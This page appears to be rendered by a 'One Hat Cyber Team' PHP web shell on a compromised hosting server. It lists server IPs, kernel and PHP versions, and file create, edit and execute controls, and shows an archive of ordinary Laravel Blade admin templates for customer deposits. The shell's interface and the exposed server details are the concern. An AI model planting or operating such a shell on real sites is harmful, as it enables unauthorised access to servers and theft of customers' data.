One Hat Cyber Team
Your IP:
216.73.216.30
Server IP:
198.54.114.155
Server:
Linux server71.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
Server Software:
LiteSpeed
PHP Version:
5.6.40
Create File
|
Create Folder
Execute
Dir :
~
/
proc
/
self
/
root
/
proc
/
thread-self
/
cwd
/
Edit File:
deposit.tar
index.blade.php 0000644 00000007453 15111244636 0007446 0 ustar 00 @extends('layouts.admin') @section('content') <div class="card"> <div class="d-sm-flex align-items-center justify-content-between"> <h5 class=" mb-0 text-gray-800 pl-3">{{ __('Deposits') }}</h5> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="{{ route('admin.dashboard') }}">{{ __('Dashboard') }}</a></li> <li class="breadcrumb-item"><a href="{{ route('admin.deposits.index') }}">{{ __('Deposits') }}</a></li> </ol> </div> </div> <!-- Row --> <div class="row mt-3"> <div class="col-lg-12"> @include('includes.admin.form-success') <div class="card mb-4"> <div class="table-responsive p-3"> <table id="geniustable" class="table table-hover dt-responsive" cellspacing="0" width="100%"> <thead class="thead-light"> <tr> <th>{{__('Date')}}</th> <th>{{__('Deposit Number')}}</th> <th>{{__('Customer Name')}}</th> <th>{{__('Customer Email')}}</th> <th>{{__('Amount')}}</th> <th>{{__('Status')}}</th> <th>{{__('Action')}}</th> </tr> </thead> </table> </div> </div> </div> </div> <div class="modal fade confirm-modal" id="statusModal" tabindex="-1" role="dialog" aria-labelledby="statusModalTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title">{{ __("Update Status") }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <p class="text-center">{{ __("You are about to change the status.") }}</p> <p class="text-center">{{ __("Do you want to proceed?") }}</p> </div> <div class="modal-footer"> <a href="javascript:;" class="btn btn-secondary" data-dismiss="modal">{{ __("Cancel") }}</a> <a href="javascript:;" class="btn btn-success btn-ok">{{ __("Update") }}</a> </div> </div> </div> </div> <div class="modal fade confirm-modal" id="details" tabindex="-1" role="dialog" aria-labelledby="statusModalTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title">{{ __("Invest Details") }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> </div> <div class="modal-footer"> <a href="javascript:;" class="btn btn-secondary" data-dismiss="modal">{{ __("Back") }}</a> </div> </div> </div> </div> @endsection @section('scripts') <script type="text/javascript"> "use strict"; var table = $('#geniustable').DataTable({ ordering: false, processing: true, serverSide: true, searching: true, ajax: '{{ route('admin.deposits.datatables') }}', columns: [ { data: 'created_at', name: 'created_at' }, { data: 'deposit_number', name: 'deposit_number' }, { data: 'customer_name', name: 'customer_name' }, { data: 'customer_email', name: 'customer_email' }, { data: 'amount', name: 'amount' }, { data: 'status', name: 'status' }, { data: 'action', name: 'action' }, ], language : { processing: '<img src="{{asset('assets/images/'.$gs->admin_loader)}}">' } }); $(document).on('click', '#applicationDetails', function () { let detailsUrl = $(this).data('href'); $.get(detailsUrl, function( data ) { $( "#details .modal-body" ).html( data ); }); }) </script> @endsection details.blade.php 0000644 00000011573 15111244636 0007762 0 ustar 00 @extends('layouts.load') @section('content') <div class="content-area no-padding"> <div class="add-product-content"> <div class="row"> <div class="col-lg-12"> <div class="product-description"> <div class="body-area" id="modalEdit"> <div class="table-responsive show-table"> <table class="table"> <tr> <th>{{ __("User ID#") }}</th> <td>{{$deposit->user->id}}</td> </tr> <tr> <th>{{ __("User Name") }}</th> <td> <a href="{{route('admin-user-show',$deposit->user->id)}}" target="_blank">{{$deposit->user->name}}</a> </td> </tr> <tr> <th>{{ __("Deposit Number") }}</th> <td>{{ $deposit->deposit_number }}</td> </tr> @if ($deposit->method == 'Manual') <tr> <th>{{ __("Transaction ID/Number") }}</th> <td>{{$deposit->txnid}}</td> </tr> @endif <tr> <th>{{ __("Deposit Number") }}</th> <td>{{ $deposit->deposit_number }}</td> </tr> <tr> <th>{{ __("Deposit Amount") }}</th> <td>${{ round($deposit->amount, 2) }}</td> </tr> <tr> <th>{{ __("Deposit Process Date") }}</th> <td>{{date('d-M-Y',strtotime($deposit->created_at))}}</td> </tr> <tr> <th>{{ __("Deposit Status") }}</th> <td>{{ucfirst($deposit->status)}}</td> </tr> <tr> <th>{{ __("User Email") }}</th> <td>{{$deposit->user->email}}</td> </tr> <tr> <th>{{ __("User Phone") }}</th> <td>{{$deposit->user->phone}}</td> </tr> <tr> <th>{{ __("Withdraw Method") }}</th> <td>{{$deposit->method}}</td> </tr> </table> </div> </div> </div> </div> </div> </div> </div> @endsection
Simpan